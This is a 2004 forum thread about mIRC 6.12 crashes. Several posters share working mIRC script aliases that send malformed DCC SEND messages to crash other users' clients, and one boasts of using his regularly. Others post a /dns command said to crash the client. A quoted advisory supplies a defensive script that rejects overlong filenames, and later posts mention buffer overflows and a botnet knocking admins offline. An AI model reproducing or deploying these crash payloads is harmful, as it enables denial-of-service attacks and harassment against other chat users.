mmh hey my friend told me his mirc crash all the time
anyone got an idea why?
it's mIRC 6.12 some other ppl told me the same mirc shit
Serhat
Feb 2 2004, 03:12 PM
Just let your friend remove all the script, maybe some buggy script is Bugging him...
geex0r
Feb 2 2004, 05:50 PM
there is an exploit for 6.12
CODE
alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }
but you have to accept it first before the exploit works
so let your friend turn off auto accept
Mamoose
Feb 2 2004, 09:57 PM
nuratasya writes "Breaking News. On Oct 20, another exploit was identified which can crash even the recently released version 6.12. It only seems to affect people who minimize DCC get dialog windows (manually or by default), and then open those windows to get a file with an excessively long filename. You can't be crashed unless that sequence of events occurs. That manual step is required. If you auto-get the file, or don't get the file at all, nothing happens.
If and only if you think the above affects you, then here is a temporary fix which should be pasted in your "remotes" section (alt-r to access). It basically rejects any excessively long filename.
ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick tried to crash you with an illegal dcc send of $nopath($filename) | halt } or this shorter version without the warning message: ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) halt
If you are not comfortable with modifying your remotes, you can just ignore all incoming DCC sends with the following, which is the same temporary fix as for the other bug described in the next section: /ignore -wd *
You can undo the above command by /ignore -rwd * (note the r for remove)." Posted on Friday, October 24 @ 22:45:32 HKT by miniPC
so i put that code in my alias and send a file to someone and wait for them to accept it???? The old exploit i had [CODE]/exploit { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) } `
nmcog
Feb 10 2004, 10:34 PM
/dns 194.65.143.148 crashes everytime all the time
Sisifos
Feb 11 2004, 07:39 AM
QUOTE (nmcog @ Feb 11 2004, 12:34 AM)
/dns 194.65.143.148 crashes everytime all the time
????? Say What ?!?!? Have you actually done that DNS and your client crashed ?
hdlgp
Feb 11 2004, 07:43 AM
:? crashed ????
nmcog
Feb 11 2004, 11:28 AM
Execute the command inside mIRC: /dns 194.65.143.148
and not nslookup.exe or whatever
Sisifos
Feb 11 2004, 02:32 PM
QUOTE (nmcog @ Feb 11 2004, 01:28 PM)
You fools. Execute the command in mIRC: /dns 194.65.143.148
This is a joke right??? You got to be kidding... Well, being a "fool" i have already tried the specific dns you requested, from your last post, both on WinXpSP1 and Win2k3. And guess what, nothing happened!!!! Could you please enlighten us as to what was suppoced to happen and why?
nmcog
Feb 11 2004, 08:54 PM
Run mIRC 6.12 execute the command inside mIRC: /dns 194.65.143.148 mirc.exe crashes (ws2_32.dll)
tested on WinXP (SP0) and WinXP (SP1)
chris105
Feb 11 2004, 09:37 PM
He is right that exploit does work, i remmber reading it has something to do with something on a certain range being NULL google it and im sure you will find the details
nubela
Feb 12 2004, 04:26 AM
doesn work for both "exploit". tried and tested.
ilnctm
Feb 12 2004, 05:47 AM
oh no not another irc bug :/
tolf
Feb 12 2004, 02:21 PM
yep crashed my Mirc
nubela
Feb 12 2004, 02:56 PM
which xploit crashed u mirc?
chris105
Feb 12 2004, 06:43 PM
You have to be using windows xp (i run sp1 and it works) and mirc 6.12 or it WONT work !!
Sisifos
Feb 16 2004, 03:21 PM
QUOTE (nmcog @ Feb 11 2004, 10:54 PM)
Run mIRC 6.12 execute the command inside mIRC: /dns 194.65.143.148 mirc.exe crashes (ws2_32.dll)
tested on WinXP (SP0) and WinXP (SP1)
Not everyone uses 6.12
zero-maitimax
Feb 16 2004, 03:30 PM
i still use it...
strange lot of ppl traid it but still it didn't crash my mirc ahahah
nmcog
Feb 16 2004, 03:45 PM
What do you use then? Because mIRC pre-6.12 has a security bug
WaZaa
Feb 16 2004, 03:52 PM
it crashed my mirc to ...
and my windows xp is upgraded fully :| ... I GUESS
damn buggiez
greetz .. WaZaa ..
Mouse
Feb 17 2004, 05:44 AM
I do have crash problem too, but I think its my script
roto
Feb 17 2004, 05:53 AM
didnt crash me, win2ksp4
roto
Feb 17 2004, 05:59 AM
crashed my XP box i guess tho:)
pdf
Feb 17 2004, 07:30 AM
QUOTE (geex0r @ Feb 2 2004, 05:50 PM)
there is an exploit for 6.12
CODE
alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }
but you have to accept it first before the exploit works
so let your friend turn off auto accept
it's not working in windows xp
Sisifos
Feb 17 2004, 01:56 PM
QUOTE (nmcog @ Feb 16 2004, 05:45 PM)
What do you use then? Because mIRC pre-6.12 has a security bug
Most if not all of the versions have some bugs... The one i use is 5.*
nmcog
Feb 17 2004, 03:17 PM
because the domain of that ip is longer than 129 bytes (i think tahts the number) and overflows, its an xp problem not a mirc problem
IcedOut3E
Feb 18 2004, 05:38 PM
crashes my shit
kind of funny.
Diawollo
Feb 18 2004, 06:41 PM
interesting
flashb4ck
Feb 18 2004, 09:36 PM
guys i know this one its older but still works on the most users which use scripts like noname,devils and so on ...
CODE
/crash { raw PRIVMSG $$1 :DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 }
perhabs someone know this method i really often (filtered) uf with this one ;D
greetz fl4Shb4Ck
slickplaid
Feb 19 2004, 03:52 PM
I tried both exploits on my WinXP SP1 machine and it crashed it both times. The long filename exploit required me to click on the download first. Fun stuff.
DvilleStoner
Feb 26 2004, 10:12 AM
it didnt crash my win2k sp4 box
NiteWorM
Feb 27 2004, 11:44 AM
that /dns bug crashes some pc's but not all because some pc's cant see the zone coz of some network crap so i am told, ive got several people to try it, it crashed for me( i am in au) and it didnt for my mate( who is in ro) so go figure
linuxwolf
Feb 27 2004, 06:22 PM
Heh.... I just think that a moderator should put a tutorial up about buffer overflows? and stack overflows? Maybe people then would understand just WHAT xp is doing, heh.. i for one know the danger of overflows, i mean, root is commonly compromised on local systems, thanks to overflows in programs not having limits. Any chance of that? gsecure?
Richie
Feb 29 2004, 07:28 PM
Recently on an irc server that I frequent, all the netadmins left with only the message "Client exited", and immediately afterwards, a small botnet joined (6 clients). Anyone have any info on how they could've killed all the admins?
The server is running unrealircd, if that's any help.